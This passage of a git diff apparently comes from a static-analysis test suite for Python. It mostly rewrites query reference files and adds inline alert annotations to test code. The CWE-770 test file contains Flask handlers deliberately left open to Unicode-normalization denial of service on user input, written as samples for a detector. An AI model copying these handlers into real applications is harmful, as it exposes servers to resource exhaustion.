tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref index aff380880ea0..1124c1683447 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-770/UnicodeDoS.ql \ No newline at end of file +query: experimental/Security/CWE-770/UnicodeDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py b/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py index 1007bcc89858..f359cdaca1c9 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py @@ -1,4 +1,4 @@ -from flask import Flask, jsonify, request +from flask import Flask, jsonify, request # $ Source import unicodedata app = Flask(__name__) @@ -13,7 +13,7 @@ def bad_1(): # Normalize the file path using NFKC Unicode normalization return ( - unicodedata.normalize("NFKC", file_path), + unicodedata.normalize("NFKC", file_path), # $ Alert 200, {"Content-Type": "application/octet-stream"}, ) @@ -25,7 +25,7 @@ def bad_2(): if len(r) >= 10: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -37,7 +37,7 @@ def bad_3(): length = len(r) if length >= 1_000: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -49,7 +49,7 @@ def bad_4(): length = len(r) if 1_000 <= length: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -61,7 +61,7 @@ def bad_5(): length = len(r) if not length < 1_000: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -73,7 +73,7 @@ def bad_6(): length = len(r) if not 1_000 > length: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 diff --git a/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref b/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref index 961494fbda1e..7b04068222b4 100644 --- a/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref +++ b/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref @@ -1 +1 @@ -../basic-full-eval/test.ql +query: ../basic-full-eval/test.ql diff --git a/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref b/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref index 58bedc4c88cf..e555b1a31260 100644 --- a/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref +++ b/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref @@ -1 +1 @@ -../coverage/argumentRoutingTest.ql +query: ../coverage/argumentRoutingTest.ql diff --git a/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref b/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref index 58bedc4c88cf..e555b1a31260 100644 --- a/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref +++ b/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref @@ -1 +1 @@ -../coverage/argumentRoutingTest.ql +query: ../coverage/argumentRoutingTest.ql diff --git a/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref b/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref index 2c005903470f..30e4cf2cc46a 100644 --- a/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref +++ b/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref @@ -1 +1 @@ -../typetracking/tracked.ql +query: ../typetracking/tracked.ql diff --git a/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref b/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref index e0efe1024162..52f5dddc6c6d 100644 --- a/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref +++ b/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref @@ -1 +1 @@ -Security/CWE-079/ReflectedXss.ql +query: Security/CWE-079/ReflectedXss.ql diff --git a/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref b/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref index d43482cc509e..ee6206aa2325 100644 --- a/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref +++ b/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref @@ -1 +1 @@ -Security/CWE-022/PathInjection.ql +query: Security/CWE-022/PathInjection.ql diff --git a/python/ql/test/modelling/FrameworkModeEndpoints.qlref b/python/ql/test/modelling/FrameworkModeEndpoints.qlref index 5ae87455edd6..ec216021687b 100644 --- a/python/ql/test/modelling/FrameworkModeEndpoints.qlref +++ b/python/ql/test/modelling/FrameworkModeEndpoints.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeEndpoints.ql \ No newline at end of file +query: utils/modeleditor/FrameworkModeEndpoints.ql diff --git a/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref b/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref index 408766dcbf4d..e093d3ebd685 100644 --- a/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref +++ b/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref @@ -1 +1,2 @@ -Classes/WrongNameForArgumentInClassInstantiation.ql \ No newline at end of file +query: Classes/WrongNameForArgumentInClassInstantiation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref b/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref index 4fdda20e1636..cbf14318e592 100644 --- a/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref +++ b/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref @@ -1 +1,2 @@ -Classes/WrongNumberArgumentsInClassInstantiation.ql \ No newline at end of file +query: Classes/WrongNumberArgumentsInClassInstantiation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py b/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py index 7363fdebef4e..5c03d0b08496 100644 --- a/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py +++ b/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py @@ -34,22 +34,22 @@ def __init__(self, x, y, z): # Too few arguments -F0() -F1() -F2() -F3() -F4() -F5() -F6(1) -F7(1,2) +F0() # $ Alert[py/call/wrong-number-class-arguments] +F1() # $ Alert[py/call/wrong-number-class-arguments] +F2() # $ Alert[py/call/wrong-number-class-arguments] +F3() # $ Alert[py/call/wrong-number-class-arguments] +F4() # $ Alert[py/call/wrong-number-class-arguments] +F5() # $ Alert[py/call/wrong-number-class-arguments] +F6(1) # $ Alert[py/call/wrong-number-class-arguments] +F7(1,2) # $ Alert[py/call/wrong-number-class-arguments] #Too many arguments -F0(1,2) -F1(1,2,3) -F5(1,2,3) -F6(1,2,3) -F6(1,2,3,4) +F0(1,2) # $ Alert[py/call/wrong-number-class-arguments] +F1(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F5(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F6(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F6(1,2,3,4) # $ Alert[py/call/wrong-number-class-arguments] #OK @@ -62,9 +62,9 @@ def __init__(self, x, y, z): #Illegal name -F0(y=1) -F1(z=1) -F2(x=0, y=1) +F0(y=1) # $ Alert[py/call/wrong-named-class-argument] +F1(z=1) # $ Alert[py/call/wrong-named-class-argument] +F2(x=0, y=1) # $ Alert[py/call/wrong-named-class-argument] #Ok name @@ -82,12 +82,12 @@ def __init__(self, x, y, z): f(*t2) #Too many -F6(*(1,2,3)) -F6(*t3) +F6(*(1,2,3)) # $ Alert[py/call/wrong-number-class-arguments] +F6(*t3) # $ Alert[py/call/wrong-number-class-arguments] #Ok F6(**{'x':1, 'y':2}) #Illegal name -F6(**{'x':1, 'y':2, 'z':3}) +F6(**{'x':1, 'y':2, 'z':3}) # $ Alert[py/call/wrong-named-class-argument] diff --git a/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref b/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref index 3d6fa6534c5c..efd0250ca2eb 100644 --- a/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref +++ b/python/ql/test/query-tests/Classes/conflicting/ConflictingAttributesInBaseClasses.qlref @@ -1 +1,2 @@ -Classes/ConflictingAttributesInBaseClasses.ql \ No newline at end of file +query: Classes/ConflictingAttributesInBaseClasses.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/conflicting/test.py b/python/ql/test/query-tests/Classes/conflicting/test.py index 624cea77ce5b..4bb75114034f 100644 --- a/python/ql/test/query-tests/Classes/conflicting/test.py +++ b/python/ql/test/query-tests/Classes/conflicting/test.py @@ -23,7 +23,7 @@ def meth(self): return 0 -class Conflict(CB1, CB2): +class Conflict(CB1, CB2): # $ Alert pass class Override1(Common): diff --git a/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref b/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref index 08449405ad61..17ec44acc881 100644 --- a/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref +++ b/python/ql/test/query-tests/Classes/descriptors/MutatingDescriptor.qlref @@ -1 +1,2 @@ -Classes/MutatingDescriptor.ql +query: Classes/MutatingDescriptor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/descriptors/test.py b/python/ql/test/query-tests/Classes/descriptors/test.py index 180ade50e366..b33ae25440f2 100644 --- a/python/ql/test/query-tests/Classes/descriptors/test.py +++ b/python/ql/test/query-tests/Classes/descriptors/test.py @@ -7,7 +7,7 @@ def __init__(self, func): def __get__(self, obj, obj_type): #Modified state is visible to all instances. - self.my_obj = obj + self.my_obj = obj # $ Alert return self def __call__(self, *args): @@ -22,4 +22,4 @@ def __set__(self, obj, value): def not_ok(self, value): #Modified state is visible to all instances. - self.my_obj = value + self.my_obj = value # $ Alert diff --git a/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref b/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref index e542a6176ad4..f3385f506bf2 100644 --- a/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref +++ b/python/ql/test/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref @@ -1 +1,2 @@ -Classes/DefineEqualsWhenAddingAttributes.ql \ No newline at end of file +query: Classes/DefineEqualsWhenAddingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py b/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py index e1e545fe9ef5..a5b1857f878f 100644 --- a/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py +++ b/python/ql/test/query-tests/Classes/equals-attr/attr_eq_test.py @@ -18,7 +18,7 @@ def __ne__(self, other): def __hash__(self): return hash((self._x, self._y)) -class BadColorPoint(Point): +class BadColorPoint(Point): # $ Alert def __init__(self, x, y, color): Point.__init__(self, x, y) diff --git a/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref b/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref index 6530409f90ac..c396a4dbc3d7 100644 --- a/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref +++ b/python/ql/test/query-tests/Classes/init-calls-subclass-method/InitCallsSubclassMethod.qlref @@ -1 +1,2 @@ -Classes/InitCallsSubclass/InitCallsSubclassMethod.ql +query: Classes/InitCallsSubclass/InitCallsSubclassMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py b/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py index ef944a9c7ef5..22f6707a4c93 100644 --- a/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py +++ b/python/ql/test/query-tests/Classes/init-calls-subclass-method/init_calls_subclass.py @@ -5,7 +5,7 @@ class Super: def __init__(self, arg): self._state = "Not OK" - self.set_up(arg) # BAD: set_up is overriden. + self.set_up(arg) # BAD: set_up is overriden. # $ Alert self._state = "OK" def set_up(self, arg): @@ -29,7 +29,7 @@ def __init__(self, arg): self.a = arg # BAD: postproc is called after initialization. This is still an issue # since it may still occur before all initialization on a subclass is complete. - self.postproc() + self.postproc() # $ Alert def postproc(self): if self.a == 1: diff --git a/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref b/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref index b29c4d250250..dcea036ee608 100644 --- a/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref +++ b/python/ql/test/query-tests/Classes/overwriting-attribute/OverwritingAttributeInSuperClass.qlref @@ -1 +1,2 @@ -Classes/OverwritingAttributeInSuperClass.ql +query: Classes/OverwritingAttributeInSuperClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py b/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py index 0372db0b2159..a17bfd662d8c 100644 --- a/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py +++ b/python/ql/test/query-tests/Classes/overwriting-attribute/overwriting_attribute.py @@ -2,7 +2,7 @@ class C(object): def __init__(self): - self.var = 0 + self.var = 0 # $ Alert class D(C): @@ -20,4 +20,4 @@ class F(E): def __init__(self): E.__init__(self) - self.var = 1 + self.var = 1 # $ Alert diff --git a/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref b/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref index f555b0af07a3..b13b7d8b7b9a 100644 --- a/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref +++ b/python/ql/test/query-tests/Classes/should-be-context-manager/ShouldBeContextManager.qlref @@ -1 +1,2 @@ -Classes/ShouldBeContextManager.ql \ No newline at end of file +query: Classes/ShouldBeContextManager.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py b/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py index 68fc81206a37..869d19f3d862 100644 --- a/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py +++ b/python/ql/test/query-tests/Classes/should-be-context-manager/should_be_context_manager.py @@ -1,6 +1,6 @@ #Should be context manager -class MegaDel(object): +class MegaDel(object): # $ Alert def __del__(self): a = self.x + self.y @@ -13,7 +13,7 @@ def __del__(self): sum += a print(sum) -class MiniDel(object): +class MiniDel(object): # $ Alert def close(self): pass diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref b/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref index 7ac0a3b18b77..f0e8fb722784 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref +++ b/python/ql/test/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/UndefinedClassAttribute.ql +query: Classes/UndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py b/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py index 0eec9974ef15..207e8f837d65 100644 --- a/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py +++ b/python/ql/test/query-tests/Classes/undefined-attribute/undefined_attribute.py @@ -21,10 +21,10 @@ def ok3(self): print (self.local_exists) def neca1(self): - print (self.not_exists) + print (self.not_exists) # $ Alert[py/undefined-attribute] def neca2(self): - print (self.may_exist) + print (self.may_exist) # $ Alert[py/maybe-undefined-attribute] #This is OK class SetViaDict(object): @@ -106,7 +106,7 @@ def use(self): class NoInit(object): def use_y(self): - return self.y + return self.y # $ Alert[py/undefined-attribute] #This is also OK class SetLocally2(object): @@ -181,7 +181,7 @@ def queue_declared(frame): # called in callback self.return_queue = frame.method.queue def use_it(self): - return self.return_queue + return self.return_queue # $ Alert[py/maybe-undefined-attribute] #Check for FPs when overriding builtin methods @@ -247,15 +247,15 @@ def x(self): class Odasa4619a(object): def call(self): - host = self.glance_host - port = self.glance_port + host = self.glance_host # $ Alert[py/undefined-attribute] + port = self.glance_port # $ Alert[py/undefined-attribute] class Odasa4619b(object): def call(self): - host = self.glance_host - port = self.glance_port + host = self.glance_host # $ Alert[py/maybe-undefined-attribute] + port = self.glance_port # $ Alert[py/maybe-undefined-attribute] @decorator def foo(self): diff --git a/python/ql/test/query-tests/Classes/useless/UselessClass.qlref b/python/ql/test/query-tests/Classes/useless/UselessClass.qlref index 9c8e87e962cd..6dac346e62bb 100644 --- a/python/ql/test/query-tests/Classes/useless/UselessClass.qlref +++ b/python/ql/test/query-tests/Classes/useless/UselessClass.qlref @@ -1 +1,2 @@ -Classes/UselessClass.ql +query: Classes/UselessClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/useless/test.py b/python/ql/test/query-tests/Classes/useless/test.py index 40c9e56e117e..063da81c1727 100644 --- a/python/ql/test/query-tests/Classes/useless/test.py +++ b/python/ql/test/query-tests/Classes/useless/test.py @@ -25,7 +25,7 @@ def do_something_else(self): pass -class Useless1(object): +class Useless1(object): # $ Alert def __init__(self): pass @@ -34,7 +34,7 @@ def do_something(self): pass -class Useless2(object): +class Useless2(object): # $ Alert def do_something(self): pass diff --git a/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref index e900e9c5314b..58bc903a431d 100644 --- a/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref +++ b/python/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -Diagnostics/ExtractedFiles.ql +query: Diagnostics/ExtractedFiles.ql diff --git a/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref b/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref index 2df3d933e8ae..68969e9bbf1c 100644 --- a/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref +++ b/python/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref @@ -1 +1 @@ -Diagnostics/ExtractionWarnings.ql +query: Diagnostics/ExtractionWarnings.ql diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref index 5588dbf2c7b4..bd98ca75af11 100644 --- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1 +1 @@ -Exceptions/CatchingBaseException.ql \ No newline at end of file +query: Exceptions/CatchingBaseException.ql diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref index 3f4987046b12..16e16f16ba5a 100644 --- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1 +1 @@ -Exceptions/EmptyExcept.ql \ No newline at end of file +query: Exceptions/EmptyExcept.ql diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref index 6d49710a7599..4e3f71fe812a 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref @@ -1 +1 @@ -Exceptions/IllegalExceptionHandlerType.ql \ No newline at end of file +query: Exceptions/IllegalExceptionHandlerType.ql diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref index 5a515d5656d3..95e65710025b 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref @@ -1 +1 @@ -Exceptions/IllegalRaise.ql \ No newline at end of file +query: Exceptions/IllegalRaise.ql diff --git a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref index 61ac527ffb99..5b199983f759 100644 --- a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref @@ -1 +1 @@ -Exceptions/NotImplementedIsNotAnException.ql \ No newline at end of file +query: Exceptions/NotImplementedIsNotAnException.ql diff --git a/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref index 3599f204f55e..c6b6ca3d30fa 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNameForArgumentInCall.ql \ No newline at end of file +query: Expressions/WrongNameForArgumentInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref index 1bffe8f1cad4..68dc510d5c6e 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsInCall.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Arguments/use_mox.py b/python/ql/test/query-tests/Expressions/Arguments/use_mox.py index 35d35574895a..0af38ad3798c 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/use_mox.py +++ b/python/ql/test/query-tests/Expressions/Arguments/use_mox.py @@ -25,9 +25,9 @@ def m1(self, x, y): #But normal functions are treated normally -f0() -f1(1) +f0() # $ Alert[py/call/wrong-arguments] +f1(1) # $ Alert[py/call/wrong-arguments] #As are normal methods -C().m0() -C().m1(1) +C().m0() # $ Alert[py/call/wrong-arguments] +C().m1(1) # $ Alert[py/call/wrong-arguments] diff --git a/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py b/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py index 284d1d19bc36..dffafbeee764 100644 --- a/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py +++ b/python/ql/test/query-tests/Expressions/Arguments/wrong_arguments.py @@ -26,22 +26,22 @@ def f7(x, y, z): # Too few arguments -f0() -f1() -f2() -f3() -f4() -f5() -f6(1) -f7(1,2) +f0() # $ Alert[py/call/wrong-arguments] +f1() # $ Alert[py/call/wrong-arguments] +f2() # $ Alert[py/call/wrong-arguments] +f3() # $ Alert[py/call/wrong-arguments] +f4() # $ Alert[py/call/wrong-arguments] +f5() # $ Alert[py/call/wrong-arguments] +f6(1) # $ Alert[py/call/wrong-arguments] +f7(1,2) # $ Alert[py/call/wrong-arguments] #Too many arguments -f0(1,2) -f1(1,2,3) -f5(1,2,3) -f6(1,2,3) -f6(1,2,3,4) +f0(1,2) # $ Alert[py/call/wrong-arguments] +f1(1,2,3) # $ Alert[py/call/wrong-arguments] +f5(1,2,3) # $ Alert[py/call/wrong-arguments] +f6(1,2,3) # $ Alert[py/call/wrong-arguments] +f6(1,2,3,4) # $ Alert[py/call/wrong-arguments] #OK @@ -54,9 +54,9 @@ def f7(x, y, z): #Illegal name -f0(y=1) -f1(z=1) -f2(x=0, y=1) +f0(y=1) # $ Alert[py/call/wrong-named-argument] +f1(z=1) # $ Alert[py/call/wrong-named-argument] +f2(x=0, y=1) # $ Alert[py/call/wrong-named-argument] #Ok name @@ -78,12 +78,12 @@ def f7(x, y, z): l1d(1) #Too many -l0(1) -l1(1,2) -l1d(1,2) +l0(1) # $ Alert[py/call/wrong-arguments] +l1(1,2) # $ Alert[py/call/wrong-arguments] +l1d(1,2) # $ Alert[py/call/wrong-arguments] #Too few -l1() +l1() # $ Alert[py/call/wrong-arguments] t2 = (1,2) @@ -93,14 +93,14 @@ def f7(x, y, z): f(*t2) #Too many -f6(*(1,2,3)) -f6(*t3) +f6(*(1,2,3)) # $ Alert[py/call/wrong-arguments] +f6(*t3) # $ Alert[py/call/wrong-arguments] #Ok f6(**{'x':1, 'y':2}) #Illegal name -f6(**{'x':1, 'y':2, 'z':3}) +f6(**{'x':1, 'y':2, 'z':3}) # $ Alert[py/call/wrong-named-argument] #Theoretically -1 arguments required. Don't report class C(object): @@ -112,7 +112,7 @@ def f(): #Too many and wrong name -- check only wrong name is flagged. -f1(x, y, z=1) +f1(x, y, z=1) # $ Alert[py/call/wrong-named-argument] #Overriding and call is wrong. @@ -127,5 +127,5 @@ def spam(self, arg0, arg1): pass e = Eggs1() if cond else Eggs2() -e.spam(0) +e.spam(0) # $ Alert[py/call/wrong-arguments] diff --git a/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref index 3b9a8dc0ccf9..044e500615f5 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref +++ b/python/ql/test/query-tests/Expressions/Formatting/MixedExplicitImplicitIn3101Format.qlref @@ -1 +1,2 @@ -Expressions/Formatting/MixedExplicitImplicitIn3101Format.ql \ No newline at end of file +query: Expressions/Formatting/MixedExplicitImplicitIn3101Format.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref b/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref index b3e654ad0526..8de137448b61 100644 --- a/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref +++ b/python/ql/test/query-tests/Expressions/Formatting/UnusedArgumentIn3101Format.qlref @@ -1 +1,2 @@ -Expressions/Formatting/UnusedArgumentIn3101Format.ql \ No newline at end of file +query: 